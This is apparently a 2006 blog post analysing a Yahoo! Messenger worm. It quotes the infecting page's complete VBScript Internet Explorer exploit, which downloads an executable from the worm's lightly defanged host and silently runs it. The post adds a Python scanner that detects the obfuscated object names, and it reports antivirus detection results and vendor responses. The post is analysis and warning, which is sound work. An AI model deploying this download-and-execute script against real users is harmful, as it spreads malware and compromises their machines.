Today I received two Yahoo! Messenger messages with very similar text, something like this:
Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau? http://chendang.net—-/nguyen/
I don’t know what it means, and take no responsibility if it means something nasty. Also, I’ve added some dashes to it. Anyway, the URL in this message points to a web page with only these sentences on it:
Sao chẳng có gì để xem thế này hả trời !!!!!
Emperor cũng làm được như mấy thằng kia thôi ^_^ keke !!!
Tất cả bây giờ chỉ là con số KHÔNG
It is a worm which spreads itself using Yahoo! Messenger and infects unpatched IE users when they visit the www.chendang.net website. You can find more information on its symptoms and removal on F-Secure’s page and McAfee’s page.
This is the VB script inside that page, an old IE exploit:
<script language="VBScript">
on error resume next
dl = "http://www.chendang.net----/nguyen/love..exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
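The script builds the string "Adodb.Stream" from four fragments, so a plain substring signature for that name never matches the page. The following is an added example, not part of the original post or of any vendor's detection: a small Python scanner that folds simple VBScript string assignments and reports which ProgIDs the page actually hands to CreateObject. The sample input is constructed, and the names `scan`, `resolve` and `RISKY_PROGIDS` are assumptions of this example.

```python
import re
# Constructed sample modelled on the script above (download lines left out).
SAMPLE = '''<script language="VBScript">
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
set Q = df.createobject("Shell.Application","")
</script>'''

# classid taken from the script above (the RDS.DataSpace ActiveX control).
RDS_CLSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"
RISKY_PROGIDS = {"microsoft.xmlhttp", "adodb.stream",
                 "scripting.filesystemobject", "shell.application"}
ASSIGN = re.compile(r'^\s*(?:set\s+)?(\w+)\s*=\s*(.+?)\s*$', re.I)
CREATE = re.compile(r'\.createobject\s*\(\s*([^,)]+)', re.I)

def resolve(expr, env):
    """Fold string literals and known variables joined by &; None for anything else."""
    parts = []
    for tok in (t.strip() for t in expr.split("&")):
        if len(tok) >= 2 and tok[0] == tok[-1] == '"':
            parts.append(tok[1:-1])
        elif tok.lower() in env:
            parts.append(env[tok.lower()])
        else:
            return None  # function call, number, or a literal containing '&'
    return "".join(parts)

def scan(html):
    """Track string assignments line by line and resolve CreateObject arguments."""
    env, progids = {}, set()
    for line in html.splitlines():
        for m in CREATE.finditer(line):
            value = resolve(m.group(1), env)
            if value:
                progids.add(value.lower())
        m = ASSIGN.match(line)
        if m and (value := resolve(m.group(2), env)) is not None:
            env[m.group(1).lower()] = value
    return {"rds_clsid": RDS_CLSID in html.lower(),
            "progids": sorted(progids & RISKY_PROGIDS)}
```

Calling `scan(SAMPLE)` reports the classid hit together with the resolved ProgIDs, including the one that was split to avoid a literal match.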
The fact that I have received the PM means the worm does work. I will update here if I get more data, and know if it is an old one or has just gone wild. IE users, watch out!
P.S.: My antivirus did not detect the EXE file after downloading it. So: watch out ^ 2
I checked the EXE file with www.virustotal.com and these are the results:
|Antivirus||Version||Update||Result|
|AntiVir||184.108.40.206||09.18.2006||no virus found|
|Authentium||4.93.8||09.18.2006||no virus found|
|Avast||4.7.844.0||09.15.2006||no virus found|
|AVG||386||09.18.2006||no virus found|
|BitDefender||7.2||09.18.2006||no virus found|
|ClamAV||devel-20060426||09.18.2006||no virus found|
|DrWeb||4.33||09.18.2006||no virus found|
|eTrust-InoculateIT||23.72.127||09.16.2006||no virus found|
|eTrust-Vet||30.3.3084||09.18.2006||no virus found|
|Ewido||4.0||09.18.2006||no virus found|
|Fortinet||220.127.116.11||09.18.2006||no virus found|
|F-Prot||3.16f||09.18.2006||no virus found|
|F-Prot4||18.104.22.168||09.18.2006||no virus found|
|Ikarus||0.2.65.0||09.18.2006||no virus found|
|McAfee||4854||09.18.2006||no virus found|
|Microsoft||1.1560||09.17.2006||no virus found|
|NOD32v2||1.1761||09.18.2006||no virus found|
|Norman||5.90.23||09.18.2006||no virus found|
|Panda||22.214.171.124||09.18.2006||no virus found|
|Sophos||4.09.0||09.18.2006||no virus found|
|Symantec||8.0||09.18.2006||no virus found|
|TheHacker||6.0.1.071||09.17.2006||no virus found|
|UNA||1.83||09.18.2006||no virus found|
|VBA32||3.11.1||09.18.2006||no virus found|
|VirusBuster||4.3.7:9||09.18.2006||no virus found|
Apparently only Kaspersky and CAT-QuickHeal(?) detect it. According to Kaspersky’s viruslist.com, it was first detected on September 17 2006, yesterday.
After posting this blog entry, I submitted the worm sample (the EXE file it uses) to the Avast! and F-Secure antivirus companies. Some hours later, F-Secure reached me through e-mail and confirmed that it was a recently released worm:
The file, love.exe (181 KB), is verified to be malicious. It will be detected as Trojan-Downloader.Win32.Agent.axn on our next database update.
Their weblog has a note about it and another similar one here.
Ahmad, a friend of mine, had independently sent the file to McAfee AVERT. Some time later their automated system responded that the file was not a known virus, so it was “being forwarded to an AVERT Researcher for further analysis”. Some hours later, the promised researcher contacted him. He informed him that it was a new worm:
A.V.E.R.T. Sample Analysis
Issue Number: 2529850
Virus Research Engineer: *********
Also, an EXTRA.DAT file was attached to this email. Removal instructions based on this DAT file and McAfee antivirus software were contained in the email as well.
No news from Avast! has been heard yet 🙂 Their latest update, today, does not detect the file as infected.
When I tried to upload the file to a test Yahoo! mail message, their Symantec-powered antivirus detected it as “W32.Yautoit”. Very good news for Yahoo! users.
And, by the way, these are the scan results from www.virustotal.com after 48 hours:
|Antivirus||Version||Update||Result|
|AntiVir||126.96.36.199||09.20.2006||no virus found|
|Authentium||4.93.8||09.20.2006||no virus found|
|Avast||4.7.844.0||09.19.2006||no virus found|
|AVG||386||09.20.2006||no virus found|
|ClamAV||devel-20060426||09.20.2006||no virus found|
|eTrust-InoculateIT||23.73.0||09.20.2006||no virus found|
|Ewido||4.0||09.20.2006||no virus found|
|F-Prot||3.16f||09.20.2006||no virus found|
|F-Prot4||188.8.131.52||09.20.2006||no virus found|
|Ikarus||0.2.65.0||09.20.2006||no virus found|
|Microsoft||1.1560||09.19.2006||no virus found|
|NOD32v2||1.1764||09.20.2006||no virus found|
|Symantec||8.0||09.20.2006||no virus found|
|TheHacker||6.0.1.074||09.20.2006||no virus found|
|VirusBuster||4.3.7:9||09.20.2006||no virus found|
As you may note, F-Prot has not included this in their recent update, but McAfee has.
BTW: I’m wondering what would happen if the worm writer had used this IE exploit instead of this old exploit. This new one works even on a fully patched Windows machine.